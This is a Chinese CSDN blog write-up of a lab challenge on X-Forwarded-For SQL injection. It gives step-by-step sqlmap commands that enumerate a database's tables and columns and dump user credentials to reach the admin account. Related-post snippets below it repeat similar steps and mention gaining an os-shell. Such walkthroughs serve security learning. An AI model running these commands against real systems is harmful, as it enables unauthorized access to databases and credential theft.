360众测靶场题库之16- X-Forwarded-For注入漏洞

最新推荐文章于 2024-03-12 18:37:01 发布
最新推荐文章于 2024-03-12 18:37:01 发布
阅读量265 收藏
点赞数 3
分类专栏: 360众测靶场题库 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjl12344/article/details/136537718
版权
文章讲述了作者在靶场环境中发现网站可能记录IP并利用SQL注入进行攻击的过程,通过逐步操作,包括使用Burp抓包,SQLmap进行数据库和表名、列名的探测,最终获取到admin用户的权限。
摘要由CSDN通过智能技术生成

首先打开靶场环境,是一个POST提交登陆的界面

随便输入用户名和密码试试,结果js给我们弹出一串乱码

   咱也看不懂,看到了中间的IP地址,怀疑是我们自己的IP地址,去ip138.com一看,果然是。

说明网站可能记录了我们的ip信息,与数据库交互,此时我怀疑这个就是数据库注入的点。

于是,我先用burp抓取了一个POST提交的数据包

  这里没有X-Forwarded-For这一项,于是我将这个数据包复制到kali中,加入了X-Forwarded-For并把它设置为注入点

  将文件保存为1.txt,用sqlmap尝试注入

sqlmap -r "/root/1.txt" --current-db --batch --threads 10

大功告成,获得了数据库名字为'webcalendar'.

接下来顺水推舟,一层层注入,获得表名,列名

sqlmap -r "/root/1.txt" -D webcalendar --tables --batch --threads 10

先注入user表尝试

sqlmap -r "/root/1.txt" -D webcalendar -T user --columns --batch --threads 10


sqlmap -r "/root/1.txt" -D webcalendar -T user -C id,username,password --dump --batch --threads 10

  此时,发现一个admin的用户,我们尝试用他登陆后台,直接登陆成功,获得了key。

BugBounty
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6314
墨者学院-X-Forwarded-For注入漏洞实战
墨者靶场 初级:X-Forwarded-For注入漏洞实战
qq_43233085的博客
01-11 602
初级:X-Forwarded-For注入漏洞实战题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 1、掌握SQL注入的基本原理; 2、了解服务器获取客户端IP的方式; 3、了解SQL注入的工具使用; 解题方向 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。...
墨者靶场-X-Forwarded-For注入漏洞实战
qq_43590351的博客
01-19 276
墨者靶场-X-Forwarded-For注入漏洞实战 打开靶场出现后台管理登录界面,随便输入一个用户名密码 利用Burp进行拦截抓包 在XFF字段的后面加上*,复制数据包到本地并保存为1.txt文档 放入到Sqlmap中进行自动化探测 爆破数据库 sqlmap.py -r 1.txt --dbs --batch 爆破表 sqlmap.py -r 1.txt -D webcalendar --tables --batch 爆破字段 sqlmap.py -r 1.txt -D webcalendar
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 2981
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
360众测靶场题库之83- 身份认证失效漏洞实战
最新发布
zjl12344的博客
03-12 409
360众测靶场题库
墨者学院09 X-Forwarded-For注入漏洞实战
weixin_42789937的博客
02-10 565
墨者学院09 X-Forwarded-For注入漏洞实战,参考大佬wp,对于显错注入整理了手工和sqlmap两种注入流程~
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
forwarded:解析HTTP X-Forwarded-For标头
05-11
从请求中解析X-Forwarded-For标头。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
x-forward-for:X-Forwarded-For标头浏览器扩展
01-30
x转发 X-Forwarded-For标头浏览器扩展 得到它 或
Chrome插件:X-Forwarded-For Header
12-15
标题“Chrome插件:X-Forwarded-For Header”揭示了本文将深入探讨一个专门针对Google Chrome浏览器的扩展应用,该插件的主要功能是处理和设置HTTP头中的`X-Forwarded-For`字段。`X-Forwarded-For`(简称XFF)头是一...
web站点获取用户IP的安全方法 HTTP_X_FORWARDED_FOR检验
01-20
安全过滤后的getIP函数 复制代码 代码如下:  function getIP() { $realip = ”; //设置默认值 if (isset($_SERVER[‘HTTP_X_FORWARDED_FOR’])) {  $realip = $_SERVER[‘HTTP_X_FORWARDED_FOR’]; } elseif (isset($_SERVER[‘HTTP_CLIENT_IP’])) {  $realip = $_SERVER[‘HTTP_CLIENT_IP’]; } else {  $realip = $_SERVER[‘REMOTE_ADDR’]; }  preg_mat
x-forwarded-forheader1.0.1.1.1
05-01
x-forwarded-forheader1.0.1.1.1火狐老插件,可以直接本地安装在旧版火狐上面,可以用的。
WEB安全学习第二天:BurpSuit的使用
weixin_43171447的博客
04-16 612
BurpSuit完成简单CTF题目
burpsuite实战指南--如何使用burpsuite
热门推荐
蓝海
06-19 5万+
1. 学习Proxy首先看标红,intercept is on 为拦截状态  其对应的intercept is off 为非拦截状态,设置完代理后打开拦截状态,浏览器发起的请求会被burpsuite所拦截forward: 进行请求后被拦截,点击forward可以继续此次请求,如果你点击drop则丢弃此请求数据。继续请求后能够看到返回结果可以在消息分析选项卡查看这次请求的所有内容1. Raw 这个视...
xff(x-forwarded-for)介绍,某些ctf题目中的利用
09-07 7550
IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造 XFF字段 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。通俗来说,就是浏览器访问网站的IP。一般格式: X-Forwarded-For: clien...
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7657
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求头中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求头,以及remote_add
墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup
s0mor
08-09 821
首先题目提示 XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。 启动靶场 点击进入墨者的任性网页 Burpsuite抓包,放进Repeater 先GO一下 在请求头中添加X-Forwarded-For 试了试 '、and 1=1 、 and 1=2都没反应 当改为or 1=1时,提示语法错误 继续,union注入步骤 order by 5提示未知字段5,order by 4返...
burpsuit中repeater功能如何使用”及“如何修改X-Forwarded-For和Referer”
Xionghuimin的博客
11-23 4835
一、以下题为例 “ XCTF攻防世界web新手练习—xff_referer ” X老师告诉小宁其实xff和referer是可以伪造的。 X-Forwarded-For和Referer的定义以及该题的文字描述解题过程见下方这两个写的比较好的博客 https://blog.csdn.net/silence1_/article/details/89646461 https://blog.csdn.ne...
x-forwarded-for注入漏洞
03-16
x-forwarded-for注入漏洞是一种网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来欺骗服务器认为请求来自于受信任的IP地址,从而绕过IP地址过滤等安全措施,进而进行攻击。这种漏洞常见于代理...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值